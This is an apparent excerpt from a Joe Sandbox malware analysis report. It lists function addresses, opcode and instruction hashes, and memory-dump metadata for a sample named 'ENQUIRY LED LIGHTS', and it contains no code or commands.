                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                  • Instruction ID: 80c221079dd7f94a2241cd64fe84594fb401ccbdd792849c2a9b6c93b9227305
                                                                                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                  • Instruction Fuzzy Hash: 7301D1336016889BD322A619CD09B59BF99EF417D4F4844A2FB05CB6A1DBB8C800C610
                                                                                                  Function 02F963C0 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                  • Instruction ID: 34a0e62df658c74c648de17393b6308a4ada2b73bffdf7cc763da6be3cdfcf4d
                                                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                  • Instruction Fuzzy Hash: AFF06D7220001DBFEF029F94DD80DAF7BBEEB493E8B104124FA00A6060D235DD21ABA0
                                                                                                  Function 02FE61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c670c86b2eddb2910725b190ab1c7238d427ed5ed3b1b77f5b21b2d3ea627dca
                                                                                                  • Instruction ID: 53007c83a86df6b4ff9d91b9c5b5f6df65ed4bbe245259aabe88c7d3c7d636bd
                                                                                                  • Opcode Fuzzy Hash: c670c86b2eddb2910725b190ab1c7238d427ed5ed3b1b77f5b21b2d3ea627dca
                                                                                                  • Instruction Fuzzy Hash: 2C014F71E0125D9BCF04DFA9D845AEEB7B8EF58754F14409AFA01E7280D774EA01CBA4
                                                                                                  Function 02F9A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 592f8c9cb450bcf01be84df107121e687f319e9f86a1cd4c51f9b2860a1c956e
                                                                                                  • Instruction ID: 85ab2f127317c8e6f624f185107e5c887b41863716a4434c357a79801c8ae507
                                                                                                  • Opcode Fuzzy Hash: 592f8c9cb450bcf01be84df107121e687f319e9f86a1cd4c51f9b2860a1c956e
                                                                                                  • Instruction Fuzzy Hash: 7E018536601109ABDF129F84DC40EDA3B66FB4C7A4F068101FE1866224C336D970EF81
                                                                                                  Function 02F0C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c22f45016cf00a6c1a0a8c1c1402b1846531030325bfd24401f6292bb2153f8
                                                                                                  • Instruction ID: d104ffa33f2cc76757bef650540bbc63d42d36b12fd65c5c50b4db5e29f8af4c
                                                                                                  • Opcode Fuzzy Hash: 3c22f45016cf00a6c1a0a8c1c1402b1846531030325bfd24401f6292bb2153f8
                                                                                                  • Instruction Fuzzy Hash: 39F024727443005BFB109619AC82F33729AE7E07D0F25812BEB068B2C0EA70DC01C394
                                                                                                  Function 02F4656A Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cf0e46b5b4e43df7ce438122f1d0af8c57333cafe232a8665230b78e5dc906c
                                                                                                  • Instruction ID: 9d07166430cef68c9979b656c9014b6545726dec809c6fa9f3c558c28f572739
                                                                                                  • Opcode Fuzzy Hash: 7cf0e46b5b4e43df7ce438122f1d0af8c57333cafe232a8665230b78e5dc906c
                                                                                                  • Instruction Fuzzy Hash: AB01A471705A859BE732A728DD48B2577A9AB42BC8F480191BB01CB7D6DB68D801CA10
                                                                                                  Function 02FB437C Relevance: .0, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                  • Instruction ID: 808c868fd0e17e6a0e820f9bee09ad8597cb2914da37d0b8ff7646018a416a9e
                                                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                  • Instruction Fuzzy Hash: B6F0E935B41F1347DB37EA2BAA30B6EB2569FC0AC4B0D052C9701CBA42DF50D800DB90
                                                                                                  Function 02F9C89D Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 42167c4a27f98977cff1208293da88ab47b1ff4f83a61eeea97dd6c83962b7e3
                                                                                                  • Instruction ID: 9f7b309be55a84a31f670cb1fc886d2019b62c352cd94b97489d8893a50c6ebc
                                                                                                  • Opcode Fuzzy Hash: 42167c4a27f98977cff1208293da88ab47b1ff4f83a61eeea97dd6c83962b7e3
                                                                                                  • Instruction Fuzzy Hash: B4F0AF716093049FD714FF28C845E1BB7E4EF88744F80465ABA98DB394EA34E901CB96
                                                                                                  Function 02F9E872 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                  • Instruction ID: c271efabfc9a4c7e00276a21adb5cbba90e0b4f0f94ba338c535434c3f4ad05f
                                                                                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                  • Instruction Fuzzy Hash: 6FF05473B515219BEB21DF89DC80F16B3A9AFC5AA0F190066A7049B660C760EC41CBD0
                                                                                                  Function 02F40854 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                  • Instruction ID: 29eb84a721935bb0059cdd58be466e05dc6cf9769e1ce9bc48854d7150b2a241
                                                                                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                  • Instruction Fuzzy Hash: 0EF0B472610204AFE718DF21CD01F56B6EAEF98384F1480789745D71A0FEF0DD01DA54
                                                                                                  Function 02F9C912 Relevance: .0, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7f52953705d6a904075af0ee929acabfb7f47512092077c68284387dab410033
                                                                                                  • Instruction ID: 8339e9c0ad324ee9f7dabc9a8cf4c1bf369d00ba72329a8dd2aae5e7362d48be
                                                                                                  • Opcode Fuzzy Hash: 7f52953705d6a904075af0ee929acabfb7f47512092077c68284387dab410033
                                                                                                  • Instruction Fuzzy Hash: A0F0C270A0124CDFCB04EF69C515F5EB7B4EF08344F008056BA05EB385DA38EA01CB50
                                                                                                  Function 02F147FB Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 12a7c9c0e847aeb2e0e385089323b2cdcd7caf71503803aeb4b5be7bed69aee9
                                                                                                  • Instruction ID: dadaf331935927fe7dee6bf1acef8b59c3d441ef075b0fc20873e557dc34237f
                                                                                                  • Opcode Fuzzy Hash: 12a7c9c0e847aeb2e0e385089323b2cdcd7caf71503803aeb4b5be7bed69aee9
                                                                                                  • Instruction Fuzzy Hash: ABF02E32E023E08FDB32DB28C404F22B7C49B807F4F8C896ADB9A8B101C330D880CA00
                                                                                                  Function 02FD0115 Relevance: .0, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50b31bf304427c68e468112032a8b37b14b34b0b7de254994b12a7cde8b14234
                                                                                                  • Instruction ID: a27c34fb5e71e712535c8c62ca29970a7eb6e8b465e417a23ec7eadec3cf17d8
                                                                                                  • Opcode Fuzzy Hash: 50b31bf304427c68e468112032a8b37b14b34b0b7de254994b12a7cde8b14234
                                                                                                  • Instruction Fuzzy Hash: 2BF05C26C1B6C946EF227B38B9503D5BB5BD781398F1D108DD6E157605CF798493C620
                                                                                                  Function 02F52619 Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                  • Instruction ID: 6a89f03e074f3a6be7345e6394a4ce28692e713739a493cf36c99f531044a4c5
                                                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                  • Instruction Fuzzy Hash: 67E09232300A106BD7119E59CCC0F5777AEAF82B50F440479BF045E251CAE29C098AA4
                                                                                                  Function 02F4C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c4e228d5c5abf6f6c279e25e206d0c5c3cae41a695be1a2bef3c0e7481ceab83
                                                                                                  • Instruction ID: 0f6402a59e6df936dff3c4ef8b993b690ce9dc62e73cff5fbf18e869c2a6c49d
                                                                                                  • Opcode Fuzzy Hash: c4e228d5c5abf6f6c279e25e206d0c5c3cae41a695be1a2bef3c0e7481ceab83
                                                                                                  • Instruction Fuzzy Hash: 17F0E272A136509FC7229B18C548B527BD8AB01BE8F09F677D60E87522CFF4C880CE50
                                                                                                  Function 02FA6030 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                  • Instruction ID: 58d45db08eac573df1e4922c92ba20c949f1e51be60bf7fd8065e1875b520d6c
                                                                                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                  • Instruction Fuzzy Hash: 82F030B26046049FE7208F05D995F52B7EDEB057A4F49C025E709DB560D379EC80CBA4
                                                                                                  Function 02F10710 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                  • Instruction ID: 67c533cc0a95d714d1e88ac819475f2e560678021c42b2975a6a9a817eb38323
                                                                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                  • Instruction Fuzzy Hash: 95F0ED3A7043599BDB16DF16C040AE57BE9EF413E0B400098FE428B341EB31E982CF80
                                                                                                  Function 02F449D0 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                  • Instruction ID: 47654c97c38b72ff16a8ce992635dff6db4c33e7e90a44bdd36958491d70ed5d
                                                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                  • Instruction Fuzzy Hash: B6E09233744546ABC3211E558800B667AA69BC17E0F15042AE300AB150DFB0DC40E798
                                                                                                  Function 02FB678E Relevance: .0, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                  • Instruction ID: 85ad6cfb3c3c3ae7e783f71ee752cfa6ddfa3736eebdab7917590427bcf965a7
                                                                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                  • Instruction Fuzzy Hash: D9E0DF73A00524BBDB229B9A8D01F9ABBBDDF80FE4F250064B701E74D0D970DE00CA90
                                                                                                  Function 02F48EF5 Relevance: .0, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 707d9b94465ea5214cc3e67f0271ec4bae77d06b3aff8180e0899b0eb06d4921
                                                                                                  • Instruction ID: c76dabd2f7960bd71037f4270755caf7cd26c5d3ec5877f9e1ff6358c9a7914a
                                                                                                  • Opcode Fuzzy Hash: 707d9b94465ea5214cc3e67f0271ec4bae77d06b3aff8180e0899b0eb06d4921
                                                                                                  • Instruction Fuzzy Hash: 86E09235B2B1544BCE325B20AE147A83F92AB016F8F481299E9449F601CB9DD807EA40
                                                                                                  Function 02FCA456 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                  • Instruction ID: 649065fc0bd88bd30bcc35df75a6f1801750bf10fef85d6478d80461e2d18677
                                                                                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                  • Instruction Fuzzy Hash: 97E09231010A11DFD7326F25DE08B5276E2BF40795F248C2DE696014B0C7B5A8C0CE40
                                                                                                  Function 02F125E0 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 2491de52e2b2c7eb273b92399552423e2e978888fffb964fe7c85ba9be2b1913
                                                                                                  • Instruction ID: bc0769861ddd260458655e69d4096b59f5e43c413d262ed755d0ebfd09437c72
                                                                                                  • Opcode Fuzzy Hash: 2491de52e2b2c7eb273b92399552423e2e978888fffb964fe7c85ba9be2b1913
                                                                                                  • Instruction Fuzzy Hash: 19E09272100964ABC311BF69DD11F8A7BDBEB943A4F414519B61557190CB34AC50CBC4
                                                                                                  Function 02F94000 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                  • Instruction ID: 9e20c98b9184d256e5563989965fd33a5278e764d0f4f7d42be2a329e773c674
                                                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                  • Instruction Fuzzy Hash: A1E0C2347003058FEB15CF19C040B6277B6BFE5A54F28C068A9488F205EB32E843CB40
                                                                                                  Function 02F0823B Relevance: .0, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                  • Instruction ID: 0d80981124c7bb3c33bf4e3242ebbea340377a0c66ba1b59f610242c6ba0e982
                                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                  • Instruction Fuzzy Hash: 87E08C32640A30EEDB312E21DC40B5177A2FB48BE0F105929E7811A0A48774AC81EF44
                                                                                                  Function 02F12050 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 75b4af6dfb8fd808fc2d324fc295c162faede8a2606b077c41c84525149e9997
                                                                                                  • Instruction ID: 5e8ec7b009c396173b23795542b3898c74f8896bb79501de50b60fcf36ad7c75
                                                                                                  • Opcode Fuzzy Hash: 75b4af6dfb8fd808fc2d324fc295c162faede8a2606b077c41c84525149e9997
                                                                                                  • Instruction Fuzzy Hash: DEE08C321004646BC211FB9DED10F4A779BEB953A0F400125B2508B2D4CA24AC40CB94
                                                                                                  Function 02F48A90 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction ID: 968072fda0942c425ef21a94a9df60c1c4e6a46daf975eed0a1cce95290ff373
                                                                                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction Fuzzy Hash: 3BE08633511A1497C728DE18D911B7277A4EF45760F09463EA61347780CA74E544C794
                                                                                                  Function 02F66AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                  • Instruction ID: d7303127283ec67b40a5f841ca01cca3461a175fd33a5df1fc704ac083bc8004
                                                                                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                  • Instruction Fuzzy Hash: 38D05E36511A50AFC3329F1BEE04C13BBF9FBC9B60705066EA54583920C775A846CBA0
                                                                                                  Function 02FC6ED0 Relevance: .0, Instructions: 17COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                  • Instruction ID: 00ed1ac8d2f99994cb6f27dac5f64114c091a5684380f7b3218440b8dca59f8b
                                                                                                  • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                  • Instruction Fuzzy Hash: 6DD05BA510C2C687D711491981617B57F1D47C2DD4F38507ED6558FA02DA17D443D52F
                                                                                                  Function 02F4E59C Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                  • Instruction ID: 0ea72fec8f9cd39663d213ce9dba9a1b8d8a5a6ea709070f87ce59873d02cef6
                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
